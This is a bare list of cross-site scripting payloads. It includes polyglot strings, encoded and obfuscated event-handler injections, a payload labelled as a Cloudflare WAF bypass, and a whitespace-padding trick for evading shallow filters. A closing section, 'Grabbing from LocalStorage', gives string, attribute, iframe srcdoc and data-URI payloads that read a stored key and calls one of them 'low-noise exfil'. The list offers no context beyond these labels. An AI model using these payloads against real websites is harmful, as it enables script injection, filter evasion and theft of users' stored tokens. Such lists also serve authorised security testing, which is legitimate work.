'"><img src=x>${{7*2}}
1//%0Aalert?.(/Hunted/)//'/*\'/*"/*\"/*`/*\`/*&apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*S4/*/;{/8/(alert)(/Hunted/)}//>
JavaScript://%250Aalert?.(/Hunted/)// '/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/<Style/</Script/</textArea/</iFrame/<noScript>\74k<K/contentEditable/autofocus/OnFocus=/*${/*/;{/**/(alert)(/Hunted/)}//>
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
<svg/onload=confirm`1`>
<svg/onload=\u0061lert(1)>
<img src=hhttttpp onerror=&#97;&#108;&#101;&#114;&#116;&#40;1&#41;>
<svg onload=&#97;&#108;&#101;&#114;&#116;&#40;1&#41;>
<a href=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;1&#41;>click</a>
<svg onload=setTimeout`\u0061\u006c\u0065\u0072\u0074(1)`>
<svg/onload=confirm(1)>
<svg onload="throw 1">
<svg onload="confirm`${1}`">
<svg onload="confirm`XSS`">
<svg onload="throw'XSS'">
<svg onload="console.log`XSS executed`">
<svg/onload=\u0063onfirm(1)>
<svg onload=confirm`${1}`>

<scr<script>ipt>document.write("asdasd")</scr<script>ipt>
<SVG/ONLOAD=CON&#x46;IRM(1)>
<svg/onload=\u0063%6Fn%66%69%72%6D(1)>
+ADw-svg+AD4-onload=confirm(1)+ADw-/svg+AD4-       (UTF-7)
<svg/onload=con/*comment*/firm(1)>
<svg/onload=\u0063on&#x0A;firm(1)
<svg/onload=\u{63}\u{6F}\u{6E}\u{66}\u{69}\u{72}\u{6D}(1)>
<svg/onload=\u0063\u006F\u006E\u0066\u0069\u0072\u006D(1)>
<svg/onload=c+o+n+f+i+r+m(1)>
<svg/onload=\u0063+on+firm(1)>
<svg><animate onbegin=confirm(1) attributeName=x dur=1s></animate></svg>
<svg><xss onload=\u0063onfirm(1)></xss></svg>

Cloudflare Bypass, checked on 11/10/2025 (U.S. date):
<Img Src=OnXSS OnErroR=confirm(111)>
%3CImg%20Src%3DOnXSS%20OnErroR%3Dconfirm%28111%29%3E

*test start of payload with 10240 characters of whitespace to bypass shallow filters*

<img src="" ><meter onmouseover=confirm(document.domain)><progress>
<img src="" ><marquee loop=1 width=0 onfinish=confirm(1)>test</marquee>
<img src="" ><me%74er onm%6fuseover=\u0061lert(document.domain)>
<img src="" ><details open ontoggle=alert(atob('ZG9jdW1lbnQuZG9tYWlu'))>
<img src="" ><img src=x onerror=eval(String.fromCharCode(97,108,101,114,116,40,49,41))>
<img src="" ><style>@keyframes x{from{left:0;}to{left:1000px;}}:target{animation:10s ease-in-out 0s 1 x;}</style><a id=x href=# onanimationend=alert(1)>click</a>
x%22%20aut%6Ff%6f%63us%20onf%6f%63us%3D\u0061lert%601%60
<img src="%22%3E%3Cscript%3Econfirm%28document.domain%29%3C%2Fscript%3E">
" ><style>.scroll-container{overflow-x:scroll;scroll-snap-type:x mandatory;display:flex;width:300px;}.scroll-item{flex:0 0 500px;scroll-snap-align:start;}.scroll-item:first-child{animation:sample;animation-duration:0.1s;}@keyframes sample{100%{scroll-snap-align:none;}}</style><div class=scroll-container onscrollend=alert(1)><div class=scroll-item>test</div></div>
<img src="javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+confirm(1)//'">

eval(String.fromCharCode(99, 111, 110, 102, 105, 114, 109, 40, 49, 41, 59)); 
');confirm();//
');eval(String.fromCharCode(99, 111, 110, 102, 105, 114, 109, 40, 49, 41, 59));//


Grabbing from LocalStorage:

JS-string injection (if reflected into a JS string):
');(function(){var v=localStorage.getItem('MY_KEY');document.body.appendChild(document.createTextNode('LS:'+v));})();//

Attribute-injection (onclick):
" onclick="document.body.appendChild(document.createTextNode(localStorage.getItem('MY_KEY')))" x="

javascript: href (user click required, low-noise exfil):
<a href="javascript:alert(localStorage.getItem('MY_KEY'))">show</a>

iframe srcdoc (may bypass some filters):
<iframe srcdoc="<script>parent.document.body.appendChild(document.createTextNode(localStorage.getItem('MY_KEY')))</script>"></iframe>

SVG with script (data URI):
<img src="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg'%3E%3Cscript%3Eparent.document.body.appendChild(parent.document.createTextNode(localStorage.getItem('MY_KEY')))%3C/script%3E%3C/svg%3E">









